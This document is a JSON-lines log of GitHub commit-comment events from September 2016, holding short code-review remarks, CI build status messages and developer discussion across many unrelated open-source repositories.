{"id":"4562236069","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019634,"position":null,"line":null,"path":null,"commit_id":"c9580368fef69c7659b80319e205a5fa80535875","created_at":"2016-09-14T14:18:25Z","updated_at":"2016-09-14T14:18:25Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:18:25Z"}
{"id":"4562239567","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19019641,"position":null,"line":null,"path":null,"commit_id":"6fabfb238818dddd44a17c883b8b5b4f720d4e20","created_at":"2016-09-14T14:18:56Z","updated_at":"2016-09-14T14:18:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1000](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13271&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T14:18:56Z"}
{"id":"4562246814","type":"CommitCommentEvent","actor":{"login":"FrankFFFF"},"repo":{"name":"jesec/android_kernel_samsung_universal8890"},"payload":{"comment":{"id":19019666,"position":28,"line":4952,"path":"kernel/sched/fair.c","commit_id":"bfc845e8870e35495e44ca38e8edcef2c0bb2e92","created_at":"2016-09-14T14:20:05Z","updated_at":"2016-09-14T14:20:05Z","body":"Should be\r\n`static inline bool hmp_boost(void)`\r\n:)"}},"created_at":"2016-09-14T14:20:05Z"}
{"id":"4562247917","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19019672,"position":null,"line":null,"path":null,"commit_id":"6fabfb238818dddd44a17c883b8b5b4f720d4e20","created_at":"2016-09-14T14:20:17Z","updated_at":"2016-09-14T14:20:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1000](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13271&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:01:20"}},"created_at":"2016-09-14T14:20:17Z"}
{"id":"4562248849","type":"CommitCommentEvent","actor":{"login":"RBrNx"},"repo":{"name":"jnyrup/PDFsharp"},"payload":{"comment":{"id":19019676,"position":null,"line":null,"path":null,"commit_id":"d52d44a696bd4216e2bddd94823842a0ad57da1c","created_at":"2016-09-14T14:20:25Z","updated_at":"2016-09-14T14:20:25Z","body":"No problem, I'll try and get a pull request out today!"}},"created_at":"2016-09-14T14:20:25Z"}
{"id":"4562250747","type":"CommitCommentEvent","actor":{"login":"hgoel24"},"repo":{"name":"j2scode/NLP"},"payload":{"comment":{"id":19019682,"position":null,"line":null,"path":null,"commit_id":"f9da04fa08227bbdbc55852b2aedbbd180abe716","created_at":"2016-09-14T14:20:43Z","updated_at":"2016-09-14T14:20:43Z","body":"Still a syntax error is coming-\r\n relevance.append([s, c, rel])\r\n            ^\r\nSyntaxError: invalid syntax"}},"created_at":"2016-09-14T14:20:43Z"}
{"id":"4562251371","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19019684,"position":null,"line":null,"path":null,"commit_id":"aa86de012e655ea948e9cae4473b2b031db13ff9","created_at":"2016-09-14T14:20:48Z","updated_at":"2016-09-14T14:20:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1001](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13274&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T14:20:48Z"}
{"id":"4562252648","type":"CommitCommentEvent","actor":{"login":"nongtep"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19019687,"position":null,"line":null,"path":null,"commit_id":"3bf4a41ae6c459753cc5486d514d111723c33758","created_at":"2016-09-14T14:21:00Z","updated_at":"2016-09-14T14:21:00Z","body":"@DunstleOS ผมขอติดตามชมผลงานของท่านนะครัช เพิ่งรู้ว่าท่าน @DunstleOS เปิดพื้นที่ update ข้อมูลเป็นของตัวเอง /gg"}},"created_at":"2016-09-14T14:21:00Z"}
{"id":"4562253565","type":"CommitCommentEvent","actor":{"login":"kazuki43zoo"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":19019689,"position":4,"line":356,"path":"spring-boot-docs/src/main/asciidoc/spring-boot-features.adoc","commit_id":"878a0525670aa190fd6d42486bce9de5b2457b87","created_at":"2016-09-14T14:21:08Z","updated_at":"2016-09-14T14:21:08Z","body":"@snicoll \r\n\r\n* `{spring-javadoc}` ? \r\n* SpringBoot -> SpringBootTest\r\n"}},"created_at":"2016-09-14T14:21:08Z"}
{"id":"4562257888","type":"CommitCommentEvent","actor":{"login":"marleyrl"},"repo":{"name":"abhishek70/Share-Rides-Android-App"},"payload":{"comment":{"id":19019700,"position":null,"line":null,"path":null,"commit_id":"94c3bfebae5908ef1374ce6d689a966d9f4361bc","created_at":"2016-09-14T14:21:52Z","updated_at":"2016-09-14T14:21:52Z","body":"I understood, Send me the file please.  \r\n\r\nemail: marleyrlribeiro@gmail.com\r\n\r\nThanks."}},"created_at":"2016-09-14T14:21:52Z"}
{"id":"4562258636","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":19019702,"position":18,"line":17,"path":"public/.htaccess","commit_id":"ffa5b4ddb7fa8ad620d7e07c7a4ec3a88239f3b9","created_at":"2016-09-14T14:22:00Z","updated_at":"2016-09-14T14:22:00Z","body":"Maybe we should add a rewrite rule for public/index.php in case someone is not able to copy files outside of the docroot? In that case we have all scenarios covered..\r\n\r\n"}},"created_at":"2016-09-14T14:22:00Z"}
{"id":"4562260144","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":19019708,"position":18,"line":17,"path":"public/.htaccess","commit_id":"ffa5b4ddb7fa8ad620d7e07c7a4ec3a88239f3b9","created_at":"2016-09-14T14:22:14Z","updated_at":"2016-09-14T14:22:14Z","body":"Think this is the last thing to fix before merging into master"}},"created_at":"2016-09-14T14:22:14Z"}
{"id":"4562264317","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19019725,"position":null,"line":null,"path":null,"commit_id":"374026d458ee0541c57524c651802d3c51d0912f","created_at":"2016-09-14T14:22:52Z","updated_at":"2016-09-14T14:22:52Z","body":"[Code coverage](https://103-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-14T14:22:52Z"}
{"id":"4562267865","type":"CommitCommentEvent","actor":{"login":"HeroBrine1st"},"repo":{"name":"HeroBrine1st/MCBIOS-Code"},"payload":{"comment":{"id":19019740,"position":null,"line":null,"path":null,"commit_id":"bd448dc88df38984d96cf0c9902d5de0fd09a5f9","created_at":"2016-09-14T14:23:27Z","updated_at":"2016-09-14T14:23:27Z","body":"x"}},"created_at":"2016-09-14T14:23:27Z"}
{"id":"4562270146","type":"CommitCommentEvent","actor":{"login":"MarkEdmondson1234"},"repo":{"name":"MarkEdmondson1234/gtmR"},"payload":{"comment":{"id":19019748,"position":null,"line":null,"path":null,"commit_id":"348290944f106ba8794103b909aa5a76e48925c1","created_at":"2016-09-14T14:23:47Z","updated_at":"2016-09-14T14:23:47Z","body":"I'm going to export a lot of functions from the autoGoogleAPI run to finish this package off. "}},"created_at":"2016-09-14T14:23:47Z"}
{"id":"4562270326","type":"CommitCommentEvent","actor":{"login":"Fuzariane"},"repo":{"name":"c3rb-org/template_RGAA_C3rb"},"payload":{"comment":{"id":19019751,"position":null,"line":null,"path":null,"commit_id":"d3ade1055a94f5020d69a23dc99c63a0f13d871f","created_at":"2016-09-14T14:23:48Z","updated_at":"2016-09-14T14:23:48Z","body":"Renommer en .dist pour que dans 90% des cas les personnes n'aient pas à le renommer."}},"created_at":"2016-09-14T14:23:48Z"}
{"id":"4562270781","type":"CommitCommentEvent","actor":{"login":"SamyPesse"},"repo":{"name":"GitbookIO/slate-edit-list"},"payload":{"comment":{"id":19019752,"position":null,"line":null,"path":null,"commit_id":"00da2984516e2f8a66ccdd89aefa47348533527a","created_at":"2016-09-14T14:23:53Z","updated_at":"2016-09-14T14:23:53Z","body":"@mull It looks like tests are still falling, but I'm sure as soon as unit tests are back to normal, @Soreine  will release a new version 👼 "}},"created_at":"2016-09-14T14:23:53Z"}
{"id":"4562270992","type":"CommitCommentEvent","actor":{"login":"mfunk"},"repo":{"name":"Esri/solutions-geoprocessing-toolbox"},"payload":{"comment":{"id":19019754,"position":null,"line":null,"path":null,"commit_id":"4a3190fdf25acde3500d99a4db2cba7dbead2457","created_at":"2016-09-14T14:23:55Z","updated_at":"2016-09-14T14:23:55Z","body":"@lfunkhouser @nfeuerstein @topowright \r\n\r\nWHOA!!!!\r\n\r\nThe Mature Support line is not part of the repo. That was for the release on NSEC, NOT HERE. I am removing this line from the repo as to not confuse anyone reading it."}},"created_at":"2016-09-14T14:23:55Z"}
{"id":"4562272230","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19019762,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-14T14:24:09Z","updated_at":"2016-09-14T14:24:09Z","body":"You need to enable accurate blending to at least basic."}},"created_at":"2016-09-14T14:24:09Z"}
{"id":"4562274252","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_4"},"payload":{"comment":{"id":19019772,"position":null,"line":null,"path":null,"commit_id":"9b2faffeb938d44070943bc802e2d5f994fc4aac","created_at":"2016-09-14T14:24:28Z","updated_at":"2016-09-14T14:24:28Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;b7ZBtTHw&#x2F;82-add-research-result-in-the-user-module\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add research result in the User Module</a>"}},"created_at":"2016-09-14T14:24:28Z"}
{"id":"4562275670","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_4"},"payload":{"comment":{"id":19019776,"position":null,"line":null,"path":null,"commit_id":"aa7a8636e9195b56a07311548e14630b20c76f0b","created_at":"2016-09-14T14:24:41Z","updated_at":"2016-09-14T14:24:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;C8ff0TzT&#x2F;71-user-page\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> User Page</a>"}},"created_at":"2016-09-14T14:24:41Z"}
{"id":"4562275693","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019777,"position":null,"line":null,"path":null,"commit_id":"680612d5fd597ae04b9925a954fb1ba13900adfc","created_at":"2016-09-14T14:24:41Z","updated_at":"2016-09-14T14:24:41Z","body":"lgtm"}},"created_at":"2016-09-14T14:24:41Z"}
{"id":"4562278369","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_4"},"payload":{"comment":{"id":19019791,"position":null,"line":null,"path":null,"commit_id":"2949727c7369f6976f962231f7eac6f21390c0fc","created_at":"2016-09-14T14:25:05Z","updated_at":"2016-09-14T14:25:05Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;cxcRBuSu&#x2F;73-show-results-on-the-results-page\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Show Results on the Results Page</a>"}},"created_at":"2016-09-14T14:25:05Z"}
{"id":"4562280470","type":"CommitCommentEvent","actor":{"login":"tseho"},"repo":{"name":"davezuko/react-redux-starter-kit"},"payload":{"comment":{"id":19019798,"position":null,"line":null,"path":null,"commit_id":"4ecc655ae7c5db83e6c3edffd7456a667191bf2e","created_at":"2016-09-14T14:25:26Z","updated_at":"2016-09-14T14:25:26Z","body":"Hey davezuko, why did you remove those ? Is there any roadmap ?"}},"created_at":"2016-09-14T14:25:26Z"}
{"id":"4562283859","type":"CommitCommentEvent","actor":{"login":"dingfeng7niu"},"repo":{"name":"dingfeng7niu/dingfeng7niu.github.io"},"payload":{"comment":{"id":19019815,"position":null,"line":null,"path":null,"commit_id":"2db1488bc7b83040ae82ffe30e7f02f2cccd93ec","created_at":"2016-09-14T14:25:56Z","updated_at":"2016-09-14T14:25:56Z","body":"OK"}},"created_at":"2016-09-14T14:25:56Z"}
{"id":"4562285652","type":"CommitCommentEvent","actor":{"login":"miguelcleon"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19019831,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-14T14:26:16Z","updated_at":"2016-09-14T14:26:16Z","body":"by the way @lsetiawan and @emiliom the stackedinline feature is great, I didn't know about this feature before it is very helpful and I'll probably continue adding more. We might want to consider discussing where to best add these and simplify the interface.  "}},"created_at":"2016-09-14T14:26:16Z"}
{"id":"4562286465","type":"CommitCommentEvent","actor":{"login":"ryneeverett"},"repo":{"name":"stephenmcd/mezzanine"},"payload":{"comment":{"id":19019837,"position":null,"line":null,"path":null,"commit_id":"0bf71df211f70da08a6988808795f163ae01f248","created_at":"2016-09-14T14:26:24Z","updated_at":"2016-09-14T14:26:24Z","body":"Does this mean there is no longer any such thing as \"overriding\" a template? Otherwise, how would django disambiguate between overriding and extending?\r\n\r\nAlso, is there anything worth saving in the \"Overriding vs Extending Templates\" section in `docs/content-architecture.rst`?"}},"created_at":"2016-09-14T14:26:24Z"}
{"id":"4562287129","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19019839,"position":9,"line":171,"path":"UM/Settings/SettingInstance.py","commit_id":"9fa133da046af2504fd3681d6dfbedb3a46da008","created_at":"2016-09-14T14:26:29Z","updated_at":"2016-09-14T14:26:29Z","body":"You are now deleting `\"global_inherits_stack\"` but re-adding `\"value\"`. I think you intended something like this:\r\n\r\n    property_names.remove(\"global_inherits_stack\")  # Move \"global_inherits_stack\" to the front of the list so we always update that first.\r\n    property_names.insert(0, \"global_inherits_stack\")\r\n\r\nAnd perhaps then you should move `\"value\"` to the second position or something?"}},"created_at":"2016-09-14T14:26:29Z"}
{"id":"4562287360","type":"CommitCommentEvent","actor":{"login":"LorenzogamboaES"},"repo":{"name":"Jaspitos/ikariam.io"},"payload":{"comment":{"id":19019840,"position":13,"line":19,"path":"public/js/views/chat.js","commit_id":"52dcc1d1665b38a4cc28e72d6242259a31b8616a","created_at":"2016-09-14T14:26:32Z","updated_at":"2016-09-14T14:26:32Z","body":"QUE GRACIOSO ME PARTO"}},"created_at":"2016-09-14T14:26:32Z"}
{"id":"4562288238","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019844,"position":null,"line":null,"path":null,"commit_id":"353ab7f2a587a0867aad35b5012f990b7380f015","created_at":"2016-09-14T14:26:39Z","updated_at":"2016-09-14T14:26:39Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:26:39Z"}
{"id":"4562288581","type":"CommitCommentEvent","actor":{"login":"lsetiawan"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19019845,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-14T14:26:42Z","updated_at":"2016-09-14T14:26:42Z","body":"I'm not sure about this one. I started looking at it, but won't be able to look at it deeply this week. Sorry about that. Thanks."}},"created_at":"2016-09-14T14:26:42Z"}
{"id":"4562291773","type":"CommitCommentEvent","actor":{"login":"yuchenrao"},"repo":{"name":"yuchenrao/try"},"payload":{"comment":{"id":19019860,"position":39,"line":39,"path":"prec2.py","commit_id":"0127380a30eb777d10502da4411f21aa6caa2c8a","created_at":"2016-09-14T14:27:14Z","updated_at":"2016-09-14T14:27:14Z","body":"put this out of the loop which can work well"}},"created_at":"2016-09-14T14:27:14Z"}
{"id":"4562295716","type":"CommitCommentEvent","actor":{"login":"huitseeker"},"repo":{"name":"SkymindIO/spark"},"payload":{"comment":{"id":19019870,"position":null,"line":null,"path":null,"commit_id":"5374854fde881c382538084e9747067c2b834a36","created_at":"2016-09-14T14:27:48Z","updated_at":"2016-09-14T14:27:48Z","body":"The main issue I see is you're brutally reserving all available GPUs, rather that a configured set.\r\nWhile reserving a configured # of GPUs is not a panacea, it may be necessary in a dockerized context where other containers might need to grab those resources.\r\nSee https://github.com/apache/spark/pull/14644/files#diff-df7680c4732cc9bcca5124b84d7ce043R421 for an alternative read from config (i.e. `maxGPUs`)."}},"created_at":"2016-09-14T14:27:48Z"}
{"id":"4562298463","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"yakamara/redaxo_yrewrite"},"payload":{"comment":{"id":19019881,"position":14,"line":62,"path":"install.php","commit_id":"9e04945a2a771353a4c8f5f02f0b4c8d7667e4f5","created_at":"2016-09-14T14:28:15Z","updated_at":"2016-09-14T14:28:15Z","body":"Die Domain steht doch in der Domain-Tabelle ausgeschrieben drin. Und in dieser Tabelle hier (forward) wird nun über die ID referenziert."}},"created_at":"2016-09-14T14:28:15Z"}
{"id":"4562299940","type":"CommitCommentEvent","actor":{"login":"kbenne"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19019889,"position":4,"line":336,"path":"openstudiocore/src/utilities/CMakeLists.txt","commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-14T14:28:29Z","updated_at":"2016-09-14T14:28:29Z","body":"Huh? What is this? Do you mean \"${SWIG_EXECUTABLE}\" ? "}},"created_at":"2016-09-14T14:28:29Z"}
{"id":"4562301303","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19019891,"position":null,"line":null,"path":null,"commit_id":"2750b703e980135e38eaf82400286b1410437f81","created_at":"2016-09-14T14:28:40Z","updated_at":"2016-09-14T14:28:40Z","body":"Preview:\r\n\r\n![screencapture-desktop](https://cloud.githubusercontent.com/assets/32010/18516141/392f1750-7a6e-11e6-9c33-99e3b3933642.png)\r\n"}},"created_at":"2016-09-14T14:28:40Z"}
{"id":"4562301430","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19019892,"position":5,"line":147,"path":"src/game/AI/CreatureAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T14:28:41Z","updated_at":"2016-09-14T14:28:41Z","body":"Well, I think that we need to do use a few flags in the AI, and here is why I think so;\r\n\r\nMobs are sniffed with unit flag 'passive' - no other flag.\r\n\r\nwhen you attack those mobs on current cmangos/master, they just act like any old mob, because our AI and underlying system don't respect the flags. After I added Unit_Flag_Passive they now behave blizzlike; this is what grz3s was testing and verified. It is very obvious why the AIs need to check for extra flag 'no melee' - otherwise we may have a mob melee which isn't supposed to.\r\n\r\nNow, my argument comes to the Unit_Flag_Disable_Move;\r\n\r\nThere are these few mobs;\r\n\r\nTarget Dummy\r\nAdvanced Target Dummy\r\nMasterWork Target Dummy\r\n\r\n.. and a few others as well.\r\n\r\nIf we only give these passive stillstanding mobs the passive flag and not the disable move flag, they will follow us around as if they could move.... because we have nowhere in our AI to say otherwise. So I added the flag Disable_Move to the AIs because Disable Move is not a temp unit state, it is a permanent unit state some mobs have, so unless you wanna add a middleway function which translates that flag into a permanent unit state of can not move, then we need to check for this flag as well.\r\n\r\nThis is basically the only 2 flags that I see no other substitute for in unit states, Unit_Flag_Passive and Unit_Flag_Disable_Move"}},"created_at":"2016-09-14T14:28:41Z"}
{"id":"4562304321","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019898,"position":null,"line":null,"path":null,"commit_id":"ca373bd3a05d5ab7df07860a6c483186e67545a5","created_at":"2016-09-14T14:29:10Z","updated_at":"2016-09-14T14:29:10Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:29:10Z"}
{"id":"4562304558","type":"CommitCommentEvent","actor":{"login":"agibsonccc"},"repo":{"name":"SkymindIO/spark"},"payload":{"comment":{"id":19019900,"position":null,"line":null,"path":null,"commit_id":"5374854fde881c382538084e9747067c2b834a36","created_at":"2016-09-14T14:29:12Z","updated_at":"2016-09-14T14:29:12Z","body":"Basically it's WIP..I want to see it just grabbing gpus.\n\nAfter that spark.max gpus or w/e (see the latest PR from mesosphere) is\nwhat I intend to do next.\n\nOn Wed, Sep 14, 2016 at 11:27 PM, François Garillot <\nnotifications@github.com> wrote:\n\n> The main issue I see is you're brutally reserving all available GPUs,\n> rather that a configured set.\n> While reserving a configured # of GPUs is not a panacea, it may be\n> necessary in a dockerized context where other containers might need to grab\n> those resources.\n> See https://github.com/apache/spark/pull/14644/files#diff-\n> df7680c4732cc9bcca5124b84d7ce043R421 for an alternative read from config\n> (i.e. maxGPUs).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SkymindIO/spark/commit/5374854fde881c382538084e9747067c2b834a36#commitcomment-19019870>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABF18grUjOXiA3fjZAIehIFTWY4e234dks5qqARkgaJpZM4J81fm>\n> .\n>\n"}},"created_at":"2016-09-14T14:29:12Z"}
{"id":"4562304735","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19019901,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T14:29:14Z","updated_at":"2016-09-14T14:29:14Z","body":"input_processor_refactor (mbadams5) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.7%25-red.svg)</a> \n"}},"created_at":"2016-09-14T14:29:14Z"}
{"id":"4562307004","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019909,"position":null,"line":null,"path":null,"commit_id":"12b38ffcd6a7cc07dfb6c046480b0b85004c7d76","created_at":"2016-09-14T14:29:34Z","updated_at":"2016-09-14T14:29:34Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:29:34Z"}
{"id":"4562309251","type":"CommitCommentEvent","actor":{"login":"atsepkov"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":19019914,"position":null,"line":null,"path":null,"commit_id":"de6ce95fa77d92320f8ea18cf1103561a06c68d1","created_at":"2016-09-14T14:29:53Z","updated_at":"2016-09-14T14:29:53Z","body":"It does rely on type annotations as well, but mainly it uses last assignment to determine the type. I am still debating how much to trust annotations, but the assumption is that the developer will not intentionally sabotage himself by mislabeling a type. Moreover the idea is to raise errors when the type contract is violated (i.e. {} + 'string', not yet implemented) rather than a performance boost (although performance improvements may be possible as well by inlining some baselib logic). The performance boost of changing my version of deep equality for naive one is negligible (except in cases where `a` or `b` is an expensive function call that needs to be cached, which I don't do yet)."}},"created_at":"2016-09-14T14:29:53Z"}
{"id":"4562309963","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19019917,"position":null,"line":null,"path":null,"commit_id":"7096d22b1442922f20a37c81ec92778ad6f7b467","created_at":"2016-09-14T14:29:59Z","updated_at":"2016-09-14T14:29:59Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7096d22b1442922f20a37c81ec92778ad6f7b467-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7096d22b1442922f20a37c81ec92778ad6f7b467-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T14:29:59Z"}
{"id":"4562311643","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":19019922,"position":4,"line":356,"path":"spring-boot-docs/src/main/asciidoc/spring-boot-features.adoc","commit_id":"878a0525670aa190fd6d42486bce9de5b2457b87","created_at":"2016-09-14T14:30:18Z","updated_at":"2016-09-14T14:30:18Z","body":"Good catch. Will rework these."}},"created_at":"2016-09-14T14:30:18Z"}
{"id":"4562313031","type":"CommitCommentEvent","actor":{"login":"zuiaifengyusheng"},"repo":{"name":"teamShixun13/TeamCode"},"payload":{"comment":{"id":19019928,"position":null,"line":null,"path":null,"commit_id":"8dc81f574f6f1173225655860a2fff6034b86656","created_at":"2016-09-14T14:30:31Z","updated_at":"2016-09-14T14:30:31Z","body":"由于不是很明白怎么使用gitHub，前几次更新在了个人github里。"}},"created_at":"2016-09-14T14:30:31Z"}
{"id":"4562313310","type":"CommitCommentEvent","actor":{"login":"neelance"},"repo":{"name":"gopherjs/gopherjs"},"payload":{"comment":{"id":19019929,"position":null,"line":null,"path":null,"commit_id":"f2fc182abb28925c7aa40502db839c6ebd7f7171","created_at":"2016-09-14T14:30:34Z","updated_at":"2016-09-14T14:30:34Z","body":"Done."}},"created_at":"2016-09-14T14:30:34Z"}
{"id":"4562314712","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19019931,"position":null,"line":null,"path":null,"commit_id":"c3f63f748eff14db1708aed72d277a2785bd2177","created_at":"2016-09-14T14:30:47Z","updated_at":"2016-09-14T14:30:47Z","body":"++"}},"created_at":"2016-09-14T14:30:47Z"}
{"id":"4562314943","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19019932,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T14:30:49Z","updated_at":"2016-09-14T14:30:49Z","body":"@pb00068 \r\n\r\nI note that when we check that there is exactly one blocker in between ( the version with b && !more_than_one(b)), a slider can only be a sniper for a pin or a sniper for a discovered check, but not both at the same time.\r\n\r\nDoes this remark help you for your SEE algorithm?"}},"created_at":"2016-09-14T14:30:49Z"}
{"id":"4562317645","type":"CommitCommentEvent","actor":{"login":"superm1"},"repo":{"name":"timchen119/fwupd"},"payload":{"comment":{"id":19019940,"position":null,"line":null,"path":null,"commit_id":"9e54c62a5a37e30f49da8e1ef6366b3d303a05ef","created_at":"2016-09-14T14:31:16Z","updated_at":"2016-09-14T14:31:16Z","body":"I'm curious - do you have a plan to submit a pull request to upstream to add support for all the snap changes? I would think as long as it was an optional build flag with appropriate #IFDEF everywhere it would be acceptable.\r\n\r\nThis may make maintenance easier for a snap build in the future too."}},"created_at":"2016-09-14T14:31:16Z"}
{"id":"4562319077","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19019943,"position":null,"line":null,"path":null,"commit_id":"aa86de012e655ea948e9cae4473b2b031db13ff9","created_at":"2016-09-14T14:31:31Z","updated_at":"2016-09-14T14:31:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1001](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13274&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:10:42"}},"created_at":"2016-09-14T14:31:31Z"}
{"id":"4562319571","type":"CommitCommentEvent","actor":{"login":"jlcanela"},"repo":{"name":"winstonjs/winston"},"payload":{"comment":{"id":19019944,"position":null,"line":null,"path":null,"commit_id":"79767c70cd70c28344d90ca518c2f52d6083b244","created_at":"2016-09-14T14:31:35Z","updated_at":"2016-09-14T14:31:35Z","body":"❤️ this commit :)"}},"created_at":"2016-09-14T14:31:35Z"}
{"id":"4562322157","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19019949,"position":null,"line":null,"path":null,"commit_id":"20c369f4ee9f3fb18107080456d34187ee890864","created_at":"2016-09-14T14:31:58Z","updated_at":"2016-09-14T14:31:58Z","body":"lgtm, not interesting"}},"created_at":"2016-09-14T14:31:58Z"}
